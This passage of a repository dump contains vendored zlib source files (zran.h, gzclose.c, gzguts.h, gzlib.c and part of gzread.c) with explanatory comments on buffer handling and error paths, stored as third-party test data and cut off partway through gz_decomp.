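            fprintf(stderr, "zran: read error on %s\n", argv[1]);
            break;
        default:
            fprintf(stderr, "zran: error %d while building index\n", len);
        }
        return 1;
    }
    fprintf(stderr, "zran: built index with %d access points\n", len);

    // Use index by reading some bytes from an arbitrary offset.
    unsigned char buf[LEN];
    if (offset == -1)
        offset = ((index->length + 1) << 1) / 3;
    ptrdiff_t got = deflate_index_extract(in, index, offset, buf, LEN);
    if (got < 0)
        fprintf(stderr, "zran: extraction failed: %s error\n",
                got == Z_MEM_ERROR ? "out of memory" : "input corrupted");
    else {
        fwrite(buf, 1, got, stdout);
        // ptrdiff_t and off_t need not be long and long long, so cast the
        // arguments to the types the format string names.
        fprintf(stderr, "zran: extracted %ld bytes at %lld\n",
                (long)got, (long long)offset);
    }

    // Clean up and exit.
    deflate_index_free(index);
    fclose(in);
    return 0;
}

#endif

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zran.h
================================================
/* zran.h -- example of deflated stream indexing and random access
 * Copyright (C) 2005, 2012, 2018, 2023 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 * Version 1.3  18 Feb 2023  Mark Adler */

#include <stdio.h>
#include "zlib.h"

// Access point.
typedef struct point {
    off_t out;          // offset in uncompressed data
    off_t in;           // offset in compressed file of first full byte
    int bits;           // 0, or number of bits (1-7) from byte at in-1
    unsigned char window[32768];    // preceding 32K of uncompressed data
} point_t;

// Access point list.
struct deflate_index {
    int have;           // number of access points in list
    int mode;           // -15 for raw, 15 for zlib, or 31 for gzip
    off_t length;       // total length of uncompressed data
    point_t *list;      // allocated list of access points
};

// Make one pass through a zlib, gzip, or raw deflate compressed stream and
// build an index, with access points about every span bytes of uncompressed
// output. gzip files with multiple members are fully indexed. span should be
// chosen to balance the speed of random access against the memory requirements
// of the list, which is about 32K bytes per access point. The return value is
// the number of access points on success (>= 1), Z_MEM_ERROR for out of
// memory, Z_BUF_ERROR for a premature end of input, Z_DATA_ERROR for a format
// or verification error in the input file, or Z_ERRNO for a file read error.
// On success, *built points to the resulting index.
int deflate_index_build(FILE *in, off_t span, struct deflate_index **built);

// Use the index to read len bytes from offset into buf. Return the number of
// bytes read or a negative error code.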
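// If data is requested past the end of
// the uncompressed data, then deflate_index_extract() will return a value less
// than len, indicating how much was actually read into buf. If given a valid
// index, this function should not return an error unless the file was modified
// somehow since the index was generated, given that deflate_index_build() had
// validated all of the input. If nevertheless there is a failure, Z_BUF_ERROR
// is returned if the compressed data ends prematurely, Z_DATA_ERROR if the
// deflate compressed data is not valid, Z_MEM_ERROR if out of memory,
// Z_STREAM_ERROR if the index is not valid, or Z_ERRNO if there is an error
// reading or seeking on the input file.
ptrdiff_t deflate_index_extract(FILE *in, struct deflate_index *index,
                                off_t offset, unsigned char *buf, size_t len);

// Deallocate an index built by deflate_index_build().
void deflate_index_free(struct deflate_index *index);

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzclose.c
================================================
/* gzclose.c -- zlib gzclose() function
 * Copyright (C) 2004, 2010 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

#include "gzguts.h"

/* gzclose() is in a separate file so that it is linked in only if it is used.
   That way the other gzclose functions can be used instead to avoid linking in
   unneeded compression or decompression routines. */
/* Returns Z_STREAM_ERROR for a NULL file when compression support is built
   in; otherwise returns whatever gzclose_r() or gzclose_w() returns. */
int ZEXPORT gzclose(gzFile file) {
#ifndef NO_GZCOMPRESS
    gz_statep state;

    if (file == NULL)
        return Z_STREAM_ERROR;
    state = (gz_statep)file;

    /* any mode other than GZ_READ is handed to the write-side close */
    return state->mode == GZ_READ ? gzclose_r(file) : gzclose_w(file);
#else
    /* without compression support only the read-side close exists; file is
       passed through without a check here */
    return gzclose_r(file);
#endif
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzguts.h
================================================
/* gzguts.h -- zlib internal header definitions for gz* operations
 * Copyright (C) 2004-2019 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

#ifdef _LARGEFILE64_SOURCE
#  ifndef _LARGEFILE_SOURCE
#    define _LARGEFILE_SOURCE 1
#  endif
#  undef _FILE_OFFSET_BITS
#  undef _TIME_BITS
#endif

#ifdef HAVE_HIDDEN
#  define ZLIB_INTERNAL __attribute__((visibility ("hidden")))
#else
#  define ZLIB_INTERNAL
#endif

#include <stdio.h>
#include "zlib.h"
#ifdef STDC
#  include <string.h>
#  include <stdlib.h>
#  include <limits.h>
#endif

#ifndef _POSIX_SOURCE
#  define _POSIX_SOURCE
#endif
#include <fcntl.h>

#ifdef _WIN32
#  include <stddef.h>
#endif

#if defined(__TURBOC__) || defined(_MSC_VER) || defined(_WIN32)
#  include <io.h>
#endif

#if defined(_WIN32)
#  define WIDECHAR
#endif

#ifdef WINAPI_FAMILY
#  define open _open
#  define read _read
#  define write _write
#  define close _close
#endif

#ifdef NO_DEFLATE       /* for compatibility with old definition */
#  define NO_GZCOMPRESS
#endif

#if defined(STDC99) || (defined(__TURBOC__) && __TURBOC__ >= 0x550)
#  ifndef HAVE_VSNPRINTF
#    define HAVE_VSNPRINTF
#  endif
#endif

#if defined(__CYGWIN__)
#  ifndef HAVE_VSNPRINTF
#    define HAVE_VSNPRINTF
#  endif
#endif

#if defined(MSDOS) && defined(__BORLANDC__) && (BORLANDC > 0x410)
#  ifndef HAVE_VSNPRINTF
#    define HAVE_VSNPRINTF
#  endif
#endif

#ifndef HAVE_VSNPRINTF
#  ifdef MSDOS
/* vsnprintf may exist on some MS-DOS compilers (DJGPP?),
   but for now we just assume it doesn't. */
#    define NO_vsnprintf
#  endif
#  ifdef __TURBOC__
#    define NO_vsnprintf
#  endif
#  ifdef WIN32
/* In Win32, vsnprintf is available as the "non-ANSI" _vsnprintf.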
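*/
/* Review note: like _snprintf below, _vsnprintf does not guarantee null
   termination when the output is truncated, so code that ends up using this
   mapping has to terminate the buffer itself. */
#    if !defined(vsnprintf) && !defined(NO_vsnprintf)
#      if !defined(_MSC_VER) || ( defined(_MSC_VER) && _MSC_VER < 1500 )
#         define vsnprintf _vsnprintf
#      endif
#    endif
#  endif
#  ifdef __SASC
#    define NO_vsnprintf
#  endif
#  ifdef VMS
#    define NO_vsnprintf
#  endif
#  ifdef __OS400__
#    define NO_vsnprintf
#  endif
#  ifdef __MVS__
#    define NO_vsnprintf
#  endif
#endif

/* unlike snprintf (which is required in C99), _snprintf does not guarantee
   null termination of the result -- however this is only used in gzlib.c where
   the result is assured to fit in the space provided */
#if defined(_MSC_VER) && _MSC_VER < 1900
#  define snprintf _snprintf
#endif

#ifndef local
#  define local static
#endif
/* since "static" is used to mean two completely different things in C, we
   define "local" for the non-static meaning of "static", for readability
   (compile with -Dlocal if your debugger can't find static symbols) */

/* gz* functions always use library allocation functions */
#ifndef STDC
  extern voidp  malloc(uInt size);
  extern void   free(voidpf ptr);
#endif

/* get errno and strerror definition */
#if defined UNDER_CE
#  include <windows.h>
#  define zstrerror() gz_strwinerror((DWORD)GetLastError())
#else
#  ifndef NO_STRERROR
#    include <errno.h>
#    define zstrerror() strerror(errno)
#  else
#    define zstrerror() "stdio error (consult errno)"
#  endif
#endif

/* provide prototypes for these when building zlib without LFS */
#if !defined(_LARGEFILE64_SOURCE) || _LFS64_LARGEFILE-0 == 0
    ZEXTERN gzFile ZEXPORT gzopen64(const char *, const char *);
    ZEXTERN z_off64_t ZEXPORT gzseek64(gzFile, z_off64_t, int);
    ZEXTERN z_off64_t ZEXPORT gztell64(gzFile);
    ZEXTERN z_off64_t ZEXPORT gzoffset64(gzFile);
#endif

/* default memLevel */
#if MAX_MEM_LEVEL >= 8
#  define DEF_MEM_LEVEL 8
#else
#  define DEF_MEM_LEVEL  MAX_MEM_LEVEL
#endif

/* default i/o buffer size -- double this for output when reading (this and
   twice this must be able to fit in an unsigned type) */
#define GZBUFSIZE 8192

/* gzip modes, also provide a little integrity check on the passed structure */
#define GZ_NONE 0
#define GZ_READ 7247
#define GZ_WRITE 31153
#define GZ_APPEND 1     /* mode set to GZ_WRITE after the file is opened */

/* values for gz_state how */
#define LOOK 0      /* look for a gzip header */
#define COPY 1      /* copy input directly */
#define GZIP 2      /* decompress a gzip stream */

/* internal gzip file state data structure */
typedef struct {
        /* exposed contents for gzgetc() macro */
    struct gzFile_s x;      /* "x" for exposed */
                            /* x.have: number of bytes available at x.next */
                            /* x.next: next output data to deliver or write */
                            /* x.pos: current position in uncompressed data */
        /* used for both reading and writing */
    int mode;               /* see gzip modes above */
    int fd;                 /* file descriptor */
    char *path;             /* path or fd for error messages */
    unsigned size;          /* buffer size, zero if not allocated yet */
    unsigned want;          /* requested buffer size, default is GZBUFSIZE */
    unsigned char *in;      /* input buffer (double-sized when writing) */
    unsigned char *out;     /* output buffer (double-sized when reading) */
    int direct;             /* 0 if processing gzip, 1 if transparent */
        /* just for reading */
    int how;                /* 0: get header, 1: copy, 2: decompress */
    z_off64_t start;        /* where the gzip data started, for rewinding */
    int eof;                /* true if end of input file reached */
    int past;               /* true if read requested past end */
        /* just for writing */
    int level;              /* compression level */
    int strategy;           /* compression strategy */
    int reset;              /* true if a reset is pending after a Z_FINISH */
        /* seek request */
    z_off64_t skip;         /* amount to skip (already rewound if backwards) */
    int seek;               /* true if seek request pending */
        /* error information */
    int err;                /* error code */
    char *msg;              /* error message */
        /* zlib inflate or deflate stream */
    z_stream strm;          /* stream structure in-place (not a pointer) */
} gz_state;
typedef gz_state FAR *gz_statep;

/* shared functions */
void ZLIB_INTERNAL gz_error(gz_statep, int, const char *);
#if defined UNDER_CE
char ZLIB_INTERNAL *gz_strwinerror(DWORD error);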
#endif /* GT_OFF(x), where x is an unsigned value, is true if x > maximum z_off64_t value -- needed when comparing unsigned to z_off64_t, which is signed (possible z_off64_t types off_t, off64_t, and long are all signed) */ #ifdef INT_MAX # define GT_OFF(x) (sizeof(int) == sizeof(z_off64_t) && (x) > INT_MAX) #else unsigned ZLIB_INTERNAL gz_intmax(void); # define GT_OFF(x) (sizeof(int) == sizeof(z_off64_t) && (x) > gz_intmax()) #endif ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzlib.c ================================================ /* gzlib.c -- zlib functions common to reading and writing gzip files * Copyright (C) 2004-2019 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" #if defined(_WIN32) && !defined(__BORLANDC__) # define LSEEK _lseeki64 #else #if defined(_LARGEFILE64_SOURCE) && _LFS64_LARGEFILE-0 # define LSEEK lseek64 #else # define LSEEK lseek #endif #endif #if defined UNDER_CE /* Map the Windows error number in ERROR to a locale-dependent error message string and return a pointer to it. Typically, the values for ERROR come from GetLastError. The string pointed to shall not be modified by the application, but may be overwritten by a subsequent call to gz_strwinerror The gz_strwinerror function does not change the current setting of GetLastError. */ char ZLIB_INTERNAL *gz_strwinerror(DWORD error) { static char buf[1024]; wchar_t *msgbuf; DWORD lasterr = GetLastError(); DWORD chars = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER, NULL, error, 0, /* Default language */ (LPVOID)&msgbuf, 0, NULL); if (chars != 0) { /* If there is an \r\n appended, zap it. 
*/ if (chars >= 2 && msgbuf[chars - 2] == '\r' && msgbuf[chars - 1] == '\n') { chars -= 2; msgbuf[chars] = 0; } if (chars > sizeof (buf) - 1) { chars = sizeof (buf) - 1; msgbuf[chars] = 0; } wcstombs(buf, msgbuf, chars + 1); LocalFree(msgbuf); } else { sprintf(buf, "unknown win32 error (%ld)", error); } SetLastError(lasterr); return buf; } #endif /* UNDER_CE */ /* Reset gzip file state */ local void gz_reset(gz_statep state) { state->x.have = 0; /* no output data available */ if (state->mode == GZ_READ) { /* for reading ... */ state->eof = 0; /* not at end of file */ state->past = 0; /* have not read past end yet */ state->how = LOOK; /* look for gzip header */ } else /* for writing ... */ state->reset = 0; /* no deflateReset pending */ state->seek = 0; /* no seek request pending */ gz_error(state, Z_OK, NULL); /* clear error */ state->x.pos = 0; /* no uncompressed data yet */ state->strm.avail_in = 0; /* no input data yet */ } /* Open a gzip file either by name or file descriptor. */ local gzFile gz_open(const void *path, int fd, const char *mode) { gz_statep state; z_size_t len; int oflag; #ifdef O_CLOEXEC int cloexec = 0; #endif #ifdef O_EXCL int exclusive = 0; #endif /* check input */ if (path == NULL) return NULL; /* allocate gzFile structure to return */ state = (gz_statep)malloc(sizeof(gz_state)); if (state == NULL) return NULL; state->size = 0; /* no buffers allocated yet */ state->want = GZBUFSIZE; /* requested buffer size */ state->msg = NULL; /* no error message yet */ /* interpret mode */ state->mode = GZ_NONE; state->level = Z_DEFAULT_COMPRESSION; state->strategy = Z_DEFAULT_STRATEGY; state->direct = 0; while (*mode) { if (*mode >= '0' && *mode <= '9') state->level = *mode - '0'; else switch (*mode) { case 'r': state->mode = GZ_READ; break; #ifndef NO_GZCOMPRESS case 'w': state->mode = GZ_WRITE; break; case 'a': state->mode = GZ_APPEND; break; #endif case '+': /* can't read and write at the same time */ free(state); return NULL; case 'b': /* ignore -- 
will request binary anyway */ break; #ifdef O_CLOEXEC case 'e': cloexec = 1; break; #endif #ifdef O_EXCL case 'x': exclusive = 1; break; #endif case 'f': state->strategy = Z_FILTERED; break; case 'h': state->strategy = Z_HUFFMAN_ONLY; break; case 'R': state->strategy = Z_RLE; break; case 'F': state->strategy = Z_FIXED; break; case 'T': state->direct = 1; break; default: /* could consider as an error, but just ignore */ ; } mode++; } /* must provide an "r", "w", or "a" */ if (state->mode == GZ_NONE) { free(state); return NULL; } /* can't force transparent read */ if (state->mode == GZ_READ) { if (state->direct) { free(state); return NULL; } state->direct = 1; /* for empty file */ } /* save the path name for error messages */ #ifdef WIDECHAR if (fd == -2) { len = wcstombs(NULL, path, 0); if (len == (z_size_t)-1) len = 0; } else #endif len = strlen((const char *)path); state->path = (char *)malloc(len + 1); if (state->path == NULL) { free(state); return NULL; } #ifdef WIDECHAR if (fd == -2) if (len) wcstombs(state->path, path, len + 1); else *(state->path) = 0; else #endif #if !defined(NO_snprintf) && !defined(NO_vsnprintf) (void)snprintf(state->path, len + 1, "%s", (const char *)path); #else strcpy(state->path, path); #endif /* compute the flags for open() */ oflag = #ifdef O_LARGEFILE O_LARGEFILE | #endif #ifdef O_BINARY O_BINARY | #endif #ifdef O_CLOEXEC (cloexec ? O_CLOEXEC : 0) | #endif (state->mode == GZ_READ ? O_RDONLY : (O_WRONLY | O_CREAT | #ifdef O_EXCL (exclusive ? O_EXCL : 0) | #endif (state->mode == GZ_WRITE ? O_TRUNC : O_APPEND))); /* open the file with the appropriate flags (or just use fd) */ state->fd = fd > -1 ? fd : ( #ifdef WIDECHAR fd == -2 ? 
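        _wopen(path, oflag, 0666) :
#endif
        open((const char *)path, oflag, 0666));
    /* for open(), the 0666 creation mode is filtered by the process umask, so
       the permissions of a newly created file depend on the caller's umask */
    if (state->fd == -1) {
        free(state->path);
        free(state);
        return NULL;
    }
    if (state->mode == GZ_APPEND) {
        /* the return value of this seek is not checked */
        LSEEK(state->fd, 0, SEEK_END);  /* so gzoffset() is correct */
        state->mode = GZ_WRITE;         /* simplify later checks */
    }

    /* save the current position for rewinding (only if reading) */
    if (state->mode == GZ_READ) {
        state->start = LSEEK(state->fd, 0, SEEK_CUR);
        if (state->start == -1) state->start = 0;
    }

    /* initialize stream */
    gz_reset(state);

    /* return stream */
    return (gzFile)state;
}

/* -- see zlib.h -- */
/* Open by path name: forwards to gz_open() with fd == -1, which makes
   gz_open() call open() on the path itself. */
gzFile ZEXPORT gzopen(const char *path, const char *mode)
{
    return gz_open(path, -1, mode);
}

/* -- see zlib.h -- */
/* Same forwarding call as gzopen(); gz_open() is invoked with identical
   arguments. */
gzFile ZEXPORT gzopen64(const char *path, const char *mode)
{
    return gz_open(path, -1, mode);
}

/* -- see zlib.h -- */
/* Wrap an already open descriptor.  Returns NULL if fd is -1, if the
   temporary identifier cannot be allocated, or if gz_open() fails.  The
   descriptor is used as given; it is not checked for validity here. */
gzFile ZEXPORT gzdopen(int fd, const char *mode)
{
    char *path;         /* identifier for error messages */
    gzFile gz;

    /* the buffer is sized for the fixed text of "<fd:N>", the terminating
       zero and up to three digits per byte of fd */
    if (fd == -1 || (path = (char *)malloc(7 + 3 * sizeof(int))) == NULL)
        return NULL;
    /* the format must contain the %d conversion: with an empty format the
       identifier is an empty string and fd is an unused argument, so error
       messages would not name the descriptor */
#if !defined(NO_snprintf) && !defined(NO_vsnprintf)
    (void)snprintf(path, 7 + 3 * sizeof(int), "<fd:%d>", fd);
#else
    sprintf(path, "<fd:%d>", fd);   /* for debugging */
#endif
    gz = gz_open(path, fd, mode);
    /* gz_open() keeps its own copy in state->path, so the temporary can go */
    free(path);
    return gz;
}

/* -- see zlib.h -- */
#ifdef WIDECHAR
/* Open by wide-character path: fd == -2 tells gz_open() to convert the name
   with wcstombs() for messages and to open it with _wopen(). */
gzFile ZEXPORT gzopen_w(const wchar_t *path, const char *mode)
{
    return gz_open(path, -2, mode);
}
#endif

/* -- see zlib.h -- */
/* Set the requested buffer size.  Returns 0 on success, or -1 if file is
   NULL, the mode is neither GZ_READ nor GZ_WRITE, buffers were already
   allocated, or the size cannot be doubled without wrapping. */
int ZEXPORT gzbuffer(gzFile file, unsigned size)
{
    gz_statep state;

    /* get internal structure and check integrity */
    if (file == NULL)
        return -1;
    state = (gz_statep)file;
    if (state->mode != GZ_READ && state->mode != GZ_WRITE)
        return -1;

    /* make sure we haven't already allocated memory */
    if (state->size != 0)
        return -1;

    /* check and set requested size */
    /* (size << 1) < size is true exactly when doubling wraps the unsigned,
       which guards the later "want << 1" allocations */
    if ((size << 1) < size)
        return -1;              /* need to be able to double it */
    if (size < 8)
        size = 8;               /* needed to behave well with flushing */
    state->want = size;
    return 0;
}

/* -- see zlib.h -- */
int ZEXPORT gzrewind(gzFile file)
{
    gz_statep state;

    /*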
get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* check that we're reading and that there's no error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* back up and start over */ if (LSEEK(state->fd, state->start, SEEK_SET) == -1) return -1; gz_reset(state); return 0; } /* -- see zlib.h -- */ z_off64_t ZEXPORT gzseek64(gzFile file, z_off64_t offset, int whence) { unsigned n; z_off64_t ret; gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return -1; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return -1; /* check that there's no error */ if (state->err != Z_OK && state->err != Z_BUF_ERROR) return -1; /* can only seek from start or relative to current position */ if (whence != SEEK_SET && whence != SEEK_CUR) return -1; /* normalize offset to a SEEK_CUR specification */ if (whence == SEEK_SET) offset -= state->x.pos; else if (state->seek) offset += state->skip; state->seek = 0; /* if within raw area while reading, just go there */ if (state->mode == GZ_READ && state->how == COPY && state->x.pos + offset >= 0) { ret = LSEEK(state->fd, offset - (z_off64_t)state->x.have, SEEK_CUR); if (ret == -1) return -1; state->x.have = 0; state->eof = 0; state->past = 0; state->seek = 0; gz_error(state, Z_OK, NULL); state->strm.avail_in = 0; state->x.pos += offset; return state->x.pos; } /* calculate skip amount, rewinding if needed for back seek when reading */ if (offset < 0) { if (state->mode != GZ_READ) /* writing -- can't go backwards */ return -1; offset += state->x.pos; if (offset < 0) /* before start of file! */ return -1; if (gzrewind(file) == -1) /* rewind, then skip to offset */ return -1; } /* if reading, skip what's in output buffer (one less gzgetc() check) */ if (state->mode == GZ_READ) { n = GT_OFF(state->x.have) || (z_off64_t)state->x.have > offset ? 
(unsigned)offset : state->x.have; state->x.have -= n; state->x.next += n; state->x.pos += n; offset -= n; } /* request skip (if not zero) */ if (offset) { state->seek = 1; state->skip = offset; } return state->x.pos + offset; } /* -- see zlib.h -- */ z_off_t ZEXPORT gzseek(gzFile file, z_off_t offset, int whence) { z_off64_t ret; ret = gzseek64(file, (z_off64_t)offset, whence); return ret == (z_off_t)ret ? (z_off_t)ret : -1; } /* -- see zlib.h -- */ z_off64_t ZEXPORT gztell64(gzFile file) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return -1; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return -1; /* return position */ return state->x.pos + (state->seek ? state->skip : 0); } /* -- see zlib.h -- */ z_off_t ZEXPORT gztell(gzFile file) { z_off64_t ret; ret = gztell64(file); return ret == (z_off_t)ret ? (z_off_t)ret : -1; } /* -- see zlib.h -- */ z_off64_t ZEXPORT gzoffset64(gzFile file) { z_off64_t offset; gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return -1; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return -1; /* compute and return effective offset in file */ offset = LSEEK(state->fd, 0, SEEK_CUR); if (offset == -1) return -1; if (state->mode == GZ_READ) /* reading */ offset -= state->strm.avail_in; /* don't count buffered input */ return offset; } /* -- see zlib.h -- */ z_off_t ZEXPORT gzoffset(gzFile file) { z_off64_t ret; ret = gzoffset64(file); return ret == (z_off_t)ret ? (z_off_t)ret : -1; } /* -- see zlib.h -- */ int ZEXPORT gzeof(gzFile file) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return 0; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return 0; /* return end-of-file state */ return state->mode == GZ_READ ? 
state->past : 0; } /* -- see zlib.h -- */ const char * ZEXPORT gzerror(gzFile file, int *errnum) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return NULL; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return NULL; /* return error information */ if (errnum != NULL) *errnum = state->err; return state->err == Z_MEM_ERROR ? "out of memory" : (state->msg == NULL ? "" : state->msg); } /* -- see zlib.h -- */ void ZEXPORT gzclearerr(gzFile file) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return; /* clear error and end-of-file */ if (state->mode == GZ_READ) { state->eof = 0; state->past = 0; } gz_error(state, Z_OK, NULL); } /* Create an error message in allocated memory and set state->err and state->msg accordingly. Free any previous error message already there. Do not try to free or allocate space if the error is Z_MEM_ERROR (out of memory). Simply save the error message as a static string. If there is an allocation failure constructing the error message, then convert the error to out of memory. 
 */
void ZLIB_INTERNAL gz_error(gz_statep state, int err, const char *msg)
{
    /* free previously allocated message and clear */
    if (state->msg != NULL) {
        /* state->err still holds the previous code at this point; it is
           tested before free() and only overwritten further down */
        if (state->err != Z_MEM_ERROR)
            free(state->msg);
        state->msg = NULL;
    }

    /* if fatal, set state->x.have to 0 so that the gzgetc() macro fails */
    if (err != Z_OK && err != Z_BUF_ERROR)
        state->x.have = 0;

    /* set error code, and if no message, then done */
    state->err = err;
    if (msg == NULL)
        return;

    /* for an out of memory error, return literal string when requested */
    /* (state->msg stays NULL on this path and nothing is allocated; the
       text is supplied by gzerror(), which returns "out of memory" whenever
       state->err is Z_MEM_ERROR) */
    if (err == Z_MEM_ERROR)
        return;

    /* construct error message with path */
    /* the size is both string lengths plus 3: two bytes for ": " and one for
       the terminating zero -- the snprintf() bound and the strcpy()/strcat()
       fallback below both rely on this same expression, so any change to
       the message layout has to be made in all three places */
    if ((state->msg = (char *)malloc(strlen(state->path) + strlen(msg) + 3)) ==
            NULL) {
        /* allocation failed: downgrade to out of memory, leaving msg NULL */
        state->err = Z_MEM_ERROR;
        return;
    }
#if !defined(NO_snprintf) && !defined(NO_vsnprintf)
    (void)snprintf(state->msg, strlen(state->path) + strlen(msg) + 3,
                   "%s%s%s", state->path, ": ", msg);
#else
    /* unbounded copies; safe only because the buffer was sized above from
       the same two strings */
    strcpy(state->msg, state->path);
    strcat(state->msg, ": ");
    strcat(state->msg, msg);
#endif
}

#ifndef INT_MAX
/* portably return maximum value for an int (when limits.h presumed not
   available) -- we need to do this to cover cases where 2's complement not
   used, since C standard permits 1's complement and sign-bit representations,
   otherwise we could just use ((unsigned)-1) >> 1 */
unsigned ZLIB_INTERNAL gz_intmax(void)
{
    unsigned p, q;

    /* p runs through 1, 3, 7, ... (shift left, then add one) until the
       shift wraps and p stops growing; q then holds the last value before
       the wrap, and half of it is returned */
    p = 1;
    do {
        q = p;
        p <<= 1;
        p++;
    } while (p > q);
    return q >> 1;
}
#endif

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzread.c
================================================
/* gzread.c -- zlib functions for reading gzip files
 * Copyright (C) 2004-2017 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

#include "gzguts.h"

/* Use read() to load a buffer -- return -1 on error, otherwise 0.  Read from
   state->fd, and update state->eof, state->err, and state->msg as appropriate.
   This function needs to loop on read(), since read() is not guaranteed to
   read the number of bytes requested, depending on the type of descriptor. */
local int gz_load(gz_statep state, unsigned char *buf, unsigned len,
                  unsigned *have)
{
    int ret;
    /* max is a quarter of the unsigned range plus one; every read() request
       is clamped to it, presumably so that the count that comes back always
       fits in the int ret */
    unsigned get, max = ((unsigned)-1 >> 2) + 1;

    /* *have counts the bytes stored in buf so far and is valid on return
       even when the function fails part way through */
    *have = 0;
    do {
        get = len - *have;
        if (get > max)
            get = max;
        /* the caller must guarantee that buf has room for len bytes; no
           bound other than len is applied here */
        ret = read(state->fd, buf + *have, get);
        if (ret <= 0)
            break;
        *have += (unsigned)ret;
    } while (*have < len);
    /* note: with len == 0 the loop body still runs once and calls read()
       with a zero count; a zero return from that call is recorded below as
       end of file */
    if (ret < 0) {
        gz_error(state, Z_ERRNO, zstrerror());
        return -1;
    }
    if (ret == 0)
        state->eof = 1;
    return 0;
}

/* Load up input buffer and set eof flag if last data loaded -- return -1 on
   error, 0 otherwise.  Note that the eof flag is set when the end of the input
   file is reached, even though there may be unused data in the buffer.  Once
   that data has been used, no more attempts will be made to read the file.
   If strm->avail_in != 0, then the current data is moved to the beginning of
   the input buffer, and then the remainder of the buffer is loaded with the
   available data from the input file. */
local int gz_avail(gz_statep state)
{
    unsigned got;
    z_streamp strm = &(state->strm);

    /* refuse to read further once any error other than Z_BUF_ERROR is set */
    if (state->err != Z_OK && state->err != Z_BUF_ERROR)
        return -1;
    if (state->eof == 0) {
        if (strm->avail_in) {       /* copy what's there to the start */
            /* byte-by-byte forward copy towards the start of state->in;
               presumably next_in points into that same buffer, in which
               case source and destination may overlap and the ascending
               order is what keeps the copy correct */
            unsigned char *p = state->in;
            unsigned const char *q = strm->next_in;
            unsigned n = strm->avail_in;
            do {
                *p++ = *q++;
            } while (--n);
        }
        /* fill the rest of the buffer: the length passed is state->size
           minus the bytes just kept, so the load stays inside state->in as
           long as avail_in never exceeds state->size */
        if (gz_load(state, state->in + strm->avail_in,
                    state->size - strm->avail_in, &got) == -1)
            return -1;
        strm->avail_in += got;
        strm->next_in = state->in;
    }
    return 0;
}

/* Look for gzip header, set up for inflate or copy.  state->x.have must be 0.
   If this is the first time in, allocate required memory.  state->how will be
   left unchanged if there is no more input data available, will be set to COPY
   if there is no gzip header and direct copying will be performed, or it will
   be set to GZIP for decompression.
If direct copying, then leftover input data from the input buffer will be copied to the output buffer. In that case, all further file reads will be directly to either the output buffer or a user buffer. If decompressing, the inflate state will be initialized. gz_look() will return 0 on success or -1 on failure. */ local int gz_look(gz_statep state) { z_streamp strm = &(state->strm); /* allocate read buffers and inflate memory */ if (state->size == 0) { /* allocate buffers */ state->in = (unsigned char *)malloc(state->want); state->out = (unsigned char *)malloc(state->want << 1); if (state->in == NULL || state->out == NULL) { free(state->out); free(state->in); gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } state->size = state->want; /* allocate inflate memory */ state->strm.zalloc = Z_NULL; state->strm.zfree = Z_NULL; state->strm.opaque = Z_NULL; state->strm.avail_in = 0; state->strm.next_in = Z_NULL; if (inflateInit2(&(state->strm), 15 + 16) != Z_OK) { /* gunzip */ free(state->out); free(state->in); state->size = 0; gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } } /* get at least the magic bytes in the input buffer */ if (strm->avail_in < 2) { if (gz_avail(state) == -1) return -1; if (strm->avail_in == 0) return 0; } /* look for gzip magic bytes -- if there, do gzip decoding (note: there is a logical dilemma here when considering the case of a partially written gzip file, to wit, if a single 31 byte is written, then we cannot tell whether this is a single-byte file, or just a partially written gzip file -- for here we assume that if a gzip file is being written, then the header will be written in a single operation, so that reading a single byte is sufficient indication that it is not a gzip file) */ if (strm->avail_in > 1 && strm->next_in[0] == 31 && strm->next_in[1] == 139) { inflateReset(strm); state->how = GZIP; state->direct = 0; return 0; } /* no gzip header -- if we were decoding gzip before, then this is trailing garbage. 
Ignore the trailing garbage and finish. */ if (state->direct == 0) { strm->avail_in = 0; state->eof = 1; state->x.have = 0; return 0; } /* doing raw i/o, copy any leftover input to output -- this assumes that the output buffer is larger than the input buffer, which also assures space for gzungetc() */ state->x.next = state->out; memcpy(state->x.next, strm->next_in, strm->avail_in); state->x.have = strm->avail_in; strm->avail_in = 0; state->how = COPY; state->direct = 1; return 0; } /* Decompress from input to the provided next_out and avail_out in the state. On return, state->x.have and state->x.next point to the just decompressed data. If the gzip stream completes, state->how is reset to LOOK to look for the next gzip stream or raw data, once state->x.have is depleted. Returns 0 on success, -1 on failure. */ local int gz_decomp(gz_statep state) { int ret = Z_OK; unsigned had; z_streamp strm = &(state->strm); /* fill output buffer up to end of deflate stream */ had = strm->avail_out; do { /* get more input for inflate() */ if (strm->avail_in == 0 && gz_avail(state) == -1) return -1; if (strm->avail_in == 0) { gz_error(state, Z_BUF_ERROR, "unexpected end of file"); break; } /* decompress and handle errors */ ret = inflate(strm, Z_NO_FLUSH); if (ret == Z_STREAM_ERROR || ret == Z_NEED_DICT) { 